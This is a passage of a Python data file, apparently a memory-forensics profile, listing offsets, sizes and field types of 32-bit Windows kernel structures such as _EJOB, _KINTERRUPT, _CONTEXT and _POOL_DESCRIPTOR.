'ExceptionList' : [ 0x0, ['pointer', ['_EXCEPTION_REGISTRATION_RECORD']]],
'StackBase' : [ 0x4, ['pointer', ['void']]],
'StackLimit' : [ 0x8, ['pointer', ['void']]],
'SubSystemTib' : [ 0xc, ['pointer', ['void']]],
'FiberData' : [ 0x10, ['pointer', ['void']]],
'Version' : [ 0x10, ['unsigned long']],
'ArbitraryUserPointer' : [ 0x14, ['pointer', ['void']]],
'Self' : [ 0x18, ['pointer', ['_NT_TIB']]],
} ],
'_WHEA_REVISION' : [ 0x2, {
'MinorRevision' : [ 0x0, ['unsigned char']],
'MajorRevision' : [ 0x1, ['unsigned char']],
'AsUSHORT' : [ 0x0, ['unsigned short']],
} ],
'_EJOB' : [ 0x138, {
'Event' : [ 0x0, ['_KEVENT']],
'JobLinks' : [ 0x10, ['_LIST_ENTRY']],
'ProcessListHead' : [ 0x18, ['_LIST_ENTRY']],
'JobLock' : [ 0x20, ['_ERESOURCE']],
'TotalUserTime' : [ 0x58, ['_LARGE_INTEGER']],
'TotalKernelTime' : [ 0x60, ['_LARGE_INTEGER']],
'ThisPeriodTotalUserTime' : [ 0x68, ['_LARGE_INTEGER']],
'ThisPeriodTotalKernelTime' : [ 0x70, ['_LARGE_INTEGER']],
'TotalPageFaultCount' : [ 0x78, ['unsigned long']],
'TotalProcesses' : [ 0x7c, ['unsigned long']],
'ActiveProcesses' : [ 0x80, ['unsigned long']],
'TotalTerminatedProcesses' : [ 0x84, ['unsigned long']],
'PerProcessUserTimeLimit' : [ 0x88, ['_LARGE_INTEGER']],
'PerJobUserTimeLimit' : [ 0x90, ['_LARGE_INTEGER']],
'MinimumWorkingSetSize' : [ 0x98, ['unsigned long']],
'MaximumWorkingSetSize' : [ 0x9c, ['unsigned long']],
'LimitFlags' : [ 0xa0, ['unsigned long']],
'ActiveProcessLimit' : [ 0xa4, ['unsigned long']],
'Affinity' : [ 0xa8, ['_KAFFINITY_EX']],
'PriorityClass' : [ 0xb4, ['unsigned char']],
'AccessState' : [ 0xb8, ['pointer', ['_JOB_ACCESS_STATE']]],
'UIRestrictionsClass' : [ 0xbc, ['unsigned long']],
'EndOfJobTimeAction' : [ 0xc0, ['unsigned long']],
'CompletionPort' : [ 0xc4, ['pointer', ['void']]],
'CompletionKey' : [ 0xc8, ['pointer', ['void']]],
'SessionId' : [ 0xcc, ['unsigned long']],
'SchedulingClass' : [ 0xd0, ['unsigned long']],
'ReadOperationCount' : [ 0xd8, ['unsigned long long']],
'WriteOperationCount' : [ 0xe0, ['unsigned long long']],
'OtherOperationCount' : [ 0xe8, ['unsigned long long']],
'ReadTransferCount' : [ 0xf0, ['unsigned long long']],
'WriteTransferCount' : [ 0xf8, ['unsigned long long']],
'OtherTransferCount' : [ 0x100, ['unsigned long long']],
'ProcessMemoryLimit' : [ 0x108, ['unsigned long']],
'JobMemoryLimit' : [ 0x10c, ['unsigned long']],
'PeakProcessMemoryUsed' : [ 0x110, ['unsigned long']],
'PeakJobMemoryUsed' : [ 0x114, ['unsigned long']],
'CurrentJobMemoryUsed' : [ 0x118, ['unsigned long long']],
'MemoryLimitsLock' : [ 0x120, ['_EX_PUSH_LOCK']],
'JobSetLinks' : [ 0x124, ['_LIST_ENTRY']],
'MemberLevel' : [ 0x12c, ['unsigned long']],
'JobFlags' : [ 0x130, ['unsigned long']],
} ],
'__unnamed_1c56' : [ 0x4, {
'AsULONG' : [ 0x0, ['unsigned long']],
'AllowScaling' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Disabled' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'HvMaxCState' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 6, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 32, native_type='unsigned long')]],
} ],
'_PPM_IDLE_STATES' : [ 0x68, {
'Count' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x4, ['__unnamed_1c56']],
'TargetState' : [ 0x8, ['unsigned long']],
'ActualState' : [ 0xc, ['unsigned long']],
'OldState' : [ 0x10, ['unsigned long']],
'NewlyUnparked' : [ 0x14, ['unsigned char']],
'TargetProcessors' : [ 0x18, ['_KAFFINITY_EX']],
'State' : [ 0x28, ['array', 1, ['_PPM_IDLE_STATE']]],
} ],
'__unnamed_1c5f' : [ 0x10, {
'EfiInformation' : [ 0x0, ['_EFI_FIRMWARE_INFORMATION']],
'PcatInformation' : [ 0x0, ['_PCAT_FIRMWARE_INFORMATION']],
} ],
'_FIRMWARE_INFORMATION_LOADER_BLOCK' : [ 0x14, {
'FirmwareTypeEfi' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 32, native_type='unsigned long')]],
'u' : [ 0x4, ['__unnamed_1c5f']],
} ],
'_HEAP_UCR_DESCRIPTOR' : [ 0x18, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'SegmentEntry' : [ 0x8, ['_LIST_ENTRY']],
'Address' : [ 0x10, ['pointer', ['void']]],
'Size' : [ 0x14, ['unsigned long']],
} ],
'_ETW_REALTIME_CONSUMER' : [ 0x50, {
'Links' : [ 0x0, ['_LIST_ENTRY']],
'ProcessHandle' : [ 0x8, ['pointer', ['void']]],
'ProcessObject' : [ 0xc, ['pointer', ['_EPROCESS']]],
'NextNotDelivered' : [ 0x10, ['pointer', ['void']]],
'RealtimeConnectContext' : [ 0x14, ['pointer', ['void']]],
'DisconnectEvent' : [ 0x18, ['pointer', ['_KEVENT']]],
'DataAvailableEvent' : [ 0x1c, ['pointer', ['_KEVENT']]],
'UserBufferCount' : [ 0x20, ['pointer', ['unsigned long']]],
'UserBufferListHead' : [ 0x24, ['pointer', ['_SINGLE_LIST_ENTRY']]],
'BuffersLost' : [ 0x28, ['unsigned long']],
'EmptyBuffersCount' : [ 0x2c, ['unsigned long']],
'LoggerId' : [ 0x30, ['unsigned long']],
'ShutDownRequested' : [ 0x34, ['unsigned char']],
'NewBuffersLost' : [ 0x35, ['unsigned char']],
'Disconnected' : [ 0x36, ['unsigned char']],
'ReservedBufferSpaceBitMap' : [ 0x38, ['_RTL_BITMAP']],
'ReservedBufferSpace' : [ 0x40, ['pointer', ['unsigned char']]],
'ReservedBufferSpaceSize' : [ 0x44, ['unsigned long']],
'UserPagesAllocated' : [ 0x48, ['unsigned long']],
'UserPagesReused' : [ 0x4c, ['unsigned long']],
} ],
'__unnamed_1c68' : [ 0x4, {
'BaseMid' : [ 0x0, ['unsigned char']],
'Flags1' : [ 0x1, ['unsigned char']],
'Flags2' : [ 0x2, ['unsigned char']],
'BaseHi' : [ 0x3, ['unsigned char']],
} ],
'__unnamed_1c6e' : [ 0x4, {
'BaseMid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned long')]],
'Type' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 13, native_type='unsigned long')]],
'Dpl' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 15, native_type='unsigned long')]],
'Pres' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'LimitHi' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 20, native_type='unsigned long')]],
'Sys' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'Reserved_0' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'Default_Big' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long')]],
'Granularity' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'BaseHi' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_1c70' : [ 0x4, {
'Bytes' : [ 0x0, ['__unnamed_1c68']],
'Bits' : [ 0x0, ['__unnamed_1c6e']],
} ],
'_KGDTENTRY' : [ 0x8, {
'LimitLow' : [ 0x0, ['unsigned short']],
'BaseLow' : [ 0x2, ['unsigned short']],
'HighWord' : [ 0x4, ['__unnamed_1c70']],
} ],
'_POOL_DESCRIPTOR' : [ 0x1140, {
'PoolType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'PagedLock' : [ 0x4, ['_KGUARDED_MUTEX']],
'NonPagedLock' : [ 0x4, ['unsigned long']],
'RunningAllocs' : [ 0x40, ['long']],
'RunningDeAllocs' : [ 0x44, ['long']],
'TotalBigPages' : [ 0x48, ['long']],
'ThreadsProcessingDeferrals' : [ 0x4c, ['long']],
'TotalBytes' : [ 0x50, ['unsigned long']],
'PoolIndex' : [ 0x80, ['unsigned long']],
'TotalPages' : [ 0xc0, ['long']],
'PendingFrees' : [ 0x100, ['pointer', ['pointer', ['void']]]],
'PendingFreeDepth' : [ 0x104, ['long']],
'ListHeads' : [ 0x140, ['array', 512, ['_LIST_ENTRY']]],
} ],
'_KGATE' : [ 0x10, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
} ],
'_WHEA_ERROR_RECORD_HEADER' : [ 0x80, {
'Signature' : [ 0x0, ['unsigned long']],
'Revision' : [ 0x4, ['_WHEA_REVISION']],
'SignatureEnd' : [ 0x6, ['unsigned long']],
'SectionCount' : [ 0xa, ['unsigned short']],
'Severity' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrSevRecoverable', 1: 'WheaErrSevFatal', 2: 'WheaErrSevCorrected', 3: 'WheaErrSevInformational'})]],
'ValidBits' : [ 0x10, ['_WHEA_ERROR_RECORD_HEADER_VALIDBITS']],
'Length' : [ 0x14, ['unsigned long']],
'Timestamp' : [ 0x18, ['_WHEA_TIMESTAMP']],
'PlatformId' : [ 0x20, ['_GUID']],
'PartitionId' : [ 0x30, ['_GUID']],
'CreatorId' : [ 0x40, ['_GUID']],
'NotifyType' : [ 0x50, ['_GUID']],
'RecordId' : [ 0x60, ['unsigned long long']],
'Flags' : [ 0x68, ['_WHEA_ERROR_RECORD_HEADER_FLAGS']],
'PersistenceInfo' : [ 0x6c, ['_WHEA_PERSISTENCE_INFO']],
'Reserved' : [ 0x74, ['array', 12, ['unsigned char']]],
} ],
'_ALPC_PROCESS_CONTEXT' : [ 0x10, {
'Lock' : [ 0x0, ['_EX_PUSH_LOCK']],
'ViewListHead' : [ 0x4, ['_LIST_ENTRY']],
'PagedPoolQuotaCache' : [ 0xc, ['unsigned long']],
} ],
'_DRIVER_EXTENSION' : [ 0x1c, {
'DriverObject' : [ 0x0, ['pointer', ['_DRIVER_OBJECT']]],
'AddDevice' : [ 0x4, ['pointer', ['void']]],
'Count' : [ 0x8, ['unsigned long']],
'ServiceKeyName' : [ 0xc, ['_UNICODE_STRING']],
'ClientDriverExtension' : [ 0x14, ['pointer', ['_IO_CLIENT_EXTENSION']]],
'FsFilterCallbacks' : [ 0x18, ['pointer', ['_FS_FILTER_CALLBACKS']]],
} ],
'_PRIVILEGE_SET' : [ 0x14, {
'PrivilegeCount' : [ 0x0, ['unsigned long']],
'Control' : [ 0x4, ['unsigned long']],
'Privilege' : [ 0x8, ['array', 1, ['_LUID_AND_ATTRIBUTES']]],
} ],
'_CM_NOTIFY_BLOCK' : [ 0x2c, {
'HiveList' : [ 0x0, ['_LIST_ENTRY']],
'PostList' : [ 0x8, ['_LIST_ENTRY']],
'KeyControlBlock' : [ 0x10, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'KeyBody' : [ 0x14, ['pointer', ['_CM_KEY_BODY']]],
'Filter' : [ 0x18, ['BitField', dict(start_bit = 0, end_bit = 30, native_type='unsigned long')]],
'WatchTree' : [ 0x18, ['BitField', dict(start_bit = 30, end_bit = 31, native_type='unsigned long')]],
'NotifyPending' : [ 0x18, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
'SubjectContext' : [ 0x1c, ['_SECURITY_SUBJECT_CONTEXT']],
} ],
'_KINTERRUPT' : [ 0x278, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'InterruptListEntry' : [ 0x4, ['_LIST_ENTRY']],
'ServiceRoutine' : [ 0xc, ['pointer', ['void']]],
'MessageServiceRoutine' : [ 0x10, ['pointer', ['void']]],
'MessageIndex' : [ 0x14, ['unsigned long']],
'ServiceContext' : [ 0x18, ['pointer', ['void']]],
'SpinLock' : [ 0x1c, ['unsigned long']],
'TickCount' : [ 0x20, ['unsigned long']],
'ActualLock' : [ 0x24, ['pointer', ['unsigned long']]],
'DispatchAddress' : [ 0x28, ['pointer', ['void']]],
'Vector' : [ 0x2c, ['unsigned long']],
'Irql' : [ 0x30, ['unsigned char']],
'SynchronizeIrql' : [ 0x31, ['unsigned char']],
'FloatingSave' : [ 0x32, ['unsigned char']],
'Connected' : [ 0x33, ['unsigned char']],
'Number' : [ 0x34, ['unsigned long']],
'ShareVector' : [ 0x38, ['unsigned char']],
'Pad' : [ 0x39, ['array', 3, ['unsigned char']]],
'Mode' : [ 0x3c, ['Enumeration', dict(target = 'long', choices = {0: 'LevelSensitive', 1: 'Latched'})]],
'Polarity' : [ 0x40, ['Enumeration', dict(target = 'long', choices = {0: 'InterruptPolarityUnknown', 1: 'InterruptActiveHigh', 2: 'InterruptActiveLow'})]],
'ServiceCount' : [ 0x44, ['unsigned long']],
'DispatchCount' : [ 0x48, ['unsigned long']],
'Rsvd1' : [ 0x50, ['unsigned long long']],
'DispatchCode' : [ 0x58, ['array', 135, ['unsigned long']]],
} ],
'_HANDLE_TABLE_ENTRY' : [ 0x8, {
'Object' : [ 0x0, ['pointer', ['void']]],
'ObAttributes' : [ 0x0, ['unsigned long']],
'InfoTable' : [ 0x0, ['pointer', ['_HANDLE_TABLE_ENTRY_INFO']]],
'Value' : [ 0x0, ['unsigned long']],
'GrantedAccess' : [ 0x4, ['unsigned long']],
'GrantedAccessIndex' : [ 0x4, ['unsigned short']],
'CreatorBackTraceIndex' : [ 0x6, ['unsigned short']],
'NextFreeTableEntry' : [ 0x4, ['unsigned long']],
} ],
'_SID' : [ 0xc, {
'Revision' : [ 0x0, ['unsigned char']],
'SubAuthorityCount' : [ 0x1, ['unsigned char']],
'IdentifierAuthority' : [ 0x2, ['_SID_IDENTIFIER_AUTHORITY']],
'SubAuthority' : [ 0x8, ['array', 1, ['unsigned long']]],
} ],
'_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION' : [ 0x18, {
'SecurityAttributeCount' : [ 0x0, ['unsigned long']],
'SecurityAttributesList' : [ 0x4, ['_LIST_ENTRY']],
'WorkingSecurityAttributeCount' : [ 0xc, ['unsigned long']],
'WorkingSecurityAttributesList' : [ 0x10, ['_LIST_ENTRY']],
} ],
'_IMAGE_FILE_HEADER' : [ 0x14, {
'Machine' : [ 0x0, ['unsigned short']],
'NumberOfSections' : [ 0x2, ['unsigned short']],
'TimeDateStamp' : [ 0x4, ['unsigned long']],
'PointerToSymbolTable' : [ 0x8, ['unsigned long']],
'NumberOfSymbols' : [ 0xc, ['unsigned long']],
'SizeOfOptionalHeader' : [ 0x10, ['unsigned short']],
'Characteristics' : [ 0x12, ['unsigned short']],
} ],
'_MMEXTEND_INFO' : [ 0x10, {
'CommittedSize' : [ 0x0, ['unsigned long long']],
'ReferenceCount' : [ 0x8, ['unsigned long']],
} ],
'_STRING64' : [ 0x10, {
'Length' : [ 0x0, ['unsigned short']],
'MaximumLength' : [ 0x2, ['unsigned short']],
'Buffer' : [ 0x8, ['unsigned long long']],
} ],
'_HIVE_LIST_ENTRY' : [ 0x58, {
'FileName' : [ 0x0, ['pointer', ['unsigned short']]],
'BaseName' : [ 0x4, ['pointer', ['unsigned short']]],
'RegRootName' : [ 0x8, ['pointer', ['unsigned short']]],
'CmHive' : [ 0xc, ['pointer', ['_CMHIVE']]],
'HHiveFlags' : [ 0x10, ['unsigned long']],
'CmHiveFlags' : [ 0x14, ['unsigned long']],
'CmKcbCacheSize' : [ 0x18, ['unsigned long']],
'CmHive2' : [ 0x1c, ['pointer', ['_CMHIVE']]],
'HiveMounted' : [ 0x20, ['unsigned char']],
'ThreadFinished' : [ 0x21, ['unsigned char']],
'ThreadStarted' : [ 0x22, ['unsigned char']],
'Allocate' : [ 0x23, ['unsigned char']],
'WinPERequired' : [ 0x24, ['unsigned char']],
'StartEvent' : [ 0x28, ['_KEVENT']],
'FinishedEvent' : [ 0x38, ['_KEVENT']],
'MountLock' : [ 0x48, ['_KEVENT']],
} ],
'_CONTEXT' : [ 0x2cc, {
'ContextFlags' : [ 0x0, ['unsigned long']],
'Dr0' : [ 0x4, ['unsigned long']],
'Dr1' : [ 0x8, ['unsigned long']],
'Dr2' : [ 0xc, ['unsigned long']],
'Dr3' : [ 0x10, ['unsigned long']],
'Dr6' : [ 0x14, ['unsigned long']],
'Dr7' : [ 0x18, ['unsigned long']],
'FloatSave' : [ 0x1c, ['_FLOATING_SAVE_AREA']],
'SegGs' : [ 0x8c, ['unsigned long']],
'SegFs' : [ 0x90, ['unsigned long']],
'SegEs' : [ 0x94, ['unsigned long']],
'SegDs' : [ 0x98, ['unsigned long']],
'Edi' : [ 0x9c, ['unsigned long']],
'Esi' : [ 0xa0, ['unsigned long']],
'Ebx' : [ 0xa4, ['unsigned long']],
'Edx' : [ 0xa8, ['unsigned long']],
'Ecx' : [ 0xac, ['unsigned long']],
'Eax' : [ 0xb0, ['unsigned long']],
'Ebp' : [ 0xb4, ['unsigned long']],
'Eip' : [ 0xb8, ['unsigned long']],
'SegCs' : [ 0xbc, ['unsigned long']],
'EFlags' : [ 0xc0, ['unsigned long']],
'Esp' : [ 0xc4, ['unsigned long']],
'SegSs' : [ 0xc8, ['unsigned long']],
'ExtendedRegisters' : [ 0xcc, ['array', 512, ['unsigned char']]],
} ],
'_ALPC_HANDLE_TABLE' : [ 0x10, {
'Handles' : [ 0x0, ['pointer', ['_ALPC_HANDLE_ENTRY']]],
'TotalHandles' : [ 0x4, ['unsigned long']],
'Flags' : [ 0x8, ['unsigned long']],
'Lock' : [ 0xc, ['_EX_PUSH_LOCK']],
} ],
'_MMPTE_HARDWARE' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Dirty1' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Owner' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WriteThrough' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'CacheDisable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Accessed' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Dirty' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'LargePage' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'Global' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'CopyOnWrite' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Unused' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Write' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'PageFrameNumber' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_IO_COMPLETION_CONTEXT' : [ 0x8, {
'Port' : [ 0x0, ['pointer', ['void']]],
'Key' : [ 0x4, ['pointer', ['void']]],
} ],
'_IOV_FORCED_PENDING_TRACE' : [ 0x100, {
'Irp' : [ 0x0, ['pointer', ['_IRP']]],
'Thread' : [ 0x4, ['pointer', ['_ETHREAD']]],
'StackTrace' : [ 0x8, ['array', 62, ['pointer', ['void']]]],
} ],
'_DBGKD_SET_CONTEXT' : [ 0x4, {
'ContextFlags' : [ 0x0, ['unsigned long']],
} ],
'_VI_POOL_ENTRY_INUSE' : [ 0x10, {
'VirtualAddress' : [ 0x0, ['pointer', ['void']]],
'CallingAddress' : [ 0x4, ['pointer', ['void']]],
'NumberOfBytes' : [ 0x8, ['unsigned long']],
'Tag' : [ 0xc, ['unsigned long']],
} ],
'_ALPC_COMPLETION_LIST' : [ 0x54, {
'Entry' : [ 0x0, ['_LIST_ENTRY']],
'OwnerProcess' : [ 0x8, ['pointer', ['_EPROCESS']]],
'Mdl' : [ 0xc, ['pointer', ['_MDL']]],
'UserVa' : [ 0x10, ['pointer', ['void']]],
'UserLimit' : [ 0x14, ['pointer', ['void']]],
'DataUserVa' : [ 0x18, ['pointer', ['void']]],
'SystemVa' : [ 0x1c, ['pointer', ['void']]],
'TotalSize' : [ 0x20, ['unsigned long']],
'Header' : [ 0x24, ['pointer', ['_ALPC_COMPLETION_LIST_HEADER']]],
'List' : [ 0x28, ['pointer', ['void']]],
'ListSize' : [ 0x2c, ['unsigned long']],
'Bitmap' : [ 0x30, ['pointer', ['void']]],
'BitmapSize' : [ 0x34, ['unsigned long']],
'Data' : [ 0x38, ['pointer', ['void']]],
'DataSize' : [ 0x3c, ['unsigned long']],
'BitmapLimit' : [ 0x40, ['unsigned long']],
'BitmapNextHint' : [ 0x44, ['unsigned long']],
'ConcurrencyCount' : [ 0x48, ['unsigned long']],
'AttributeFlags' : [ 0x4c, ['unsigned long']],
'AttributeSize' : [ 0x50, ['unsigned long']],
} ],
'_INTERFACE' : [ 0x10, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'Context' : [ 0x4, ['pointer', ['void']]],
'InterfaceReference' : [ 0x8, ['pointer', ['void']]],
'InterfaceDereference' : [ 0xc, ['pointer', ['void']]],
} ],
'_ACL' : [ 0x8, {
'AclRevision' : [ 0x0, ['unsigned char']],
'Sbz1' : [ 0x1, ['unsigned char']],
'AclSize' : [ 0x2, ['unsigned short']],
'AceCount' : [ 0x4, ['unsigned short']],
'Sbz2' : [ 0x6, ['unsigned short']],
} ],
'_LAZY_WRITER' : [ 0x50, {
'ScanDpc' : [ 0x0, ['_KDPC']],
'ScanTimer' : [ 0x20, ['_KTIMER']],
'ScanActive' : [ 0x48, ['unsigned char']],
'OtherWork' : [ 0x49, ['unsigned char']],
'PendingTeardownScan' : [ 0x4a, ['unsigned char']],
'PendingPeriodicScan' : [ 0x4b, ['unsigned char']],
'PendingLowMemoryScan' : [ 0x4c, ['unsigned char']],
'PendingPowerScan' : [ 0x4d, ['unsigned char']],
} ],
'_PI_BUS_EXTENSION' : [ 0x44, {
'Flags' : [ 0x0, ['unsigned long']],
'NumberCSNs' : [ 0x4, ['unsigned char']],
'ReadDataPort' : [ 0x8, ['pointer', ['unsigned char']]],
'DataPortMapped' : [ 0xc, ['unsigned char']],
'AddressPort' : [ 0x10, ['pointer', ['unsigned char']]],
'AddrPortMapped' : [ 0x14, ['unsigned char']],
'CommandPort' : [ 0x18, ['pointer', ['unsigned char']]],
'CmdPortMapped' : [ 0x1c, ['unsigned char']],
'NextSlotNumber' : [ 0x20, ['unsigned long']],
'DeviceList' : [ 0x24, ['_SINGLE_LIST_ENTRY']],
'CardList' : [ 0x28, ['_SINGLE_LIST_ENTRY']],
'PhysicalBusDevice' : [ 0x2c, ['pointer', ['_DEVICE_OBJECT']]],
'FunctionalBusDevice' : [ 0x30, ['pointer', ['_DEVICE_OBJECT']]],
'AttachedDevice' : [ 0x34, ['pointer', ['_DEVICE_OBJECT']]],
'BusNumber' : [ 0x38, ['unsigned long']],
'SystemPowerState' : [ 0x3c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DevicePowerState' : [ 0x40, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
} ],
'_EXCEPTION_REGISTRATION_RECORD' : [ 0x8, {
'Next' : [ 0x0, ['pointer', ['_EXCEPTION_REGISTRATION_RECORD']]],
'Handler' : [ 0x4, ['pointer', ['void']]],
} ],
'_SID_AND_ATTRIBUTES' : [ 0x8, {
'Sid' : [ 0x0, ['pointer', ['void']]],
'Attributes' : [ 0x4, ['unsigned long']],
} ],
'_SID_IDENTIFIER_AUTHORITY' : [ 0x6, {
'Value' : [ 0x0, ['array', 6, ['unsigned char']]],
} ],
'_IO_WORKITEM' : [ 0x20, {
'WorkItem' : [ 0x0, ['_WORK_QUEUE_ITEM']],
'Routine' : [ 0x10, ['pointer', ['void']]],
'IoObject' : [ 0x14, ['pointer', ['void']]],
'Context' : [ 0x18, ['pointer', ['void']]],
'Type' : [ 0x1c, ['unsigned long']],
} ],
'_CM_RM' : [ 0x58, {
'RmListEntry' : [ 0x0, ['_LIST_ENTRY']],
'TransactionListHead' : [ 0x8, ['_LIST_ENTRY']],
'TmHandle' : [ 0x10, ['pointer', ['void']]],
'Tm' : [ 0x14, ['pointer', ['void']]],
'RmHandle' : [ 0x18, ['pointer', ['void']]],
'KtmRm' : [ 0x1c, ['pointer', ['void']]],
'RefCount' : [ 0x20, ['unsigned long']],
'ContainerNum' : [ 0x24, ['unsigned long']],
'ContainerSize' : [ 0x28, ['unsigned long long']],
'CmHive' : [ 0x30, ['pointer', ['_CMHIVE']]],
'LogFileObject' : [ 0x34, ['pointer', ['void']]],
'MarshallingContext' : [ 0x38, ['pointer', ['void']]],
'RmFlags' : [ 0x3c, ['unsigned long']],
'LogStartStatus1' : [ 0x40, ['long']],
'LogStartStatus2' : [ 0x44, ['long']],
'BaseLsn' : [ 0x48, ['unsigned long long']],
'RmLock' : [ 0x50, ['pointer', ['_ERESOURCE']]],
} ],
'_CHILD_LIST' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'List' : [ 0x4, ['unsigned long']],
} ],
'_MMVAD_FLAGS' : [ 0x4, {
'CommitCharge' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 19, native_type='unsigned long')]],
'NoChange' : [ 0x0, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'VadType' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 23, native_type='unsigned long')]],
'MemCommit' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 29, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 29, end_bit = 31, native_type='unsigned long')]],
'PrivateMemory' : [ 0x0, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
} ],
'_MMWSLE_HASH' : [ 0x4, {
'Index' : [ 0x0, ['unsigned long']],
} ],
'_STRING32' : [ 0x8, {
'Length' : [ 0x0, ['unsigned short']],
'MaximumLength' : [ 0x2, ['unsigned short']],
'Buffer' : [ 0x4, ['unsigned long']],
} ],
'_DBGKD_FILL_MEMORY' : [ 0x10, {
'Address' : [ 0x0, ['unsigned long long']],
'Length' : [ 0x8, ['unsigned long']],
'Flags' : [ 0xc, ['unsigned short']],
'PatternLength' : [ 0xe, ['unsigned short']],
} ],
'_HEAP_STOP_ON_VALUES' : [ 0x18, {
'AllocAddress' : [ 0x0, ['unsigned long']],
'AllocTag' : [ 0x4, ['_HEAP_STOP_ON_TAG']],
'ReAllocAddress' : [ 0x8, ['unsigned long']],
'ReAllocTag' : [ 0xc, ['_HEAP_STOP_ON_TAG']],
'FreeAddress' : [ 0x10, ['unsigned long']],
'FreeTag' : [ 0x14, ['_HEAP_STOP_ON_TAG']],
} ],
'_HEAP_PSEUDO_TAG_ENTRY' : [ 0xc, {
'Allocs' : [ 0x0, ['unsigned long']],
'Frees' : [ 0x4, ['unsigned long']],
'Size' : [ 0x8, ['unsigned long']],
} ],
'_CALL_HASH_ENTRY' : [ 0x14, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'CallersAddress' : [ 0x8, ['pointer', ['void']]],
'CallersCaller' : [ 0xc, ['pointer', ['void']]],
'CallCount' : [ 0x10, ['unsigned long']],
} ],
'_VF_TRACKER_STAMP' : [ 0x8, {
'Thread' : [ 0x0, ['pointer', ['void']]],
'Flags' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
'OldIrql' : [ 0x5, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
'NewIrql' : [ 0x6, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
'Processor' : [ 0x7, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
} ],
'_VI_TRACK_IRQL' : [ 0x20, {
'Thread' : [ 0x0, ['pointer', ['void']]],
'OldIrql' : [ 0x4, ['unsigned char']],
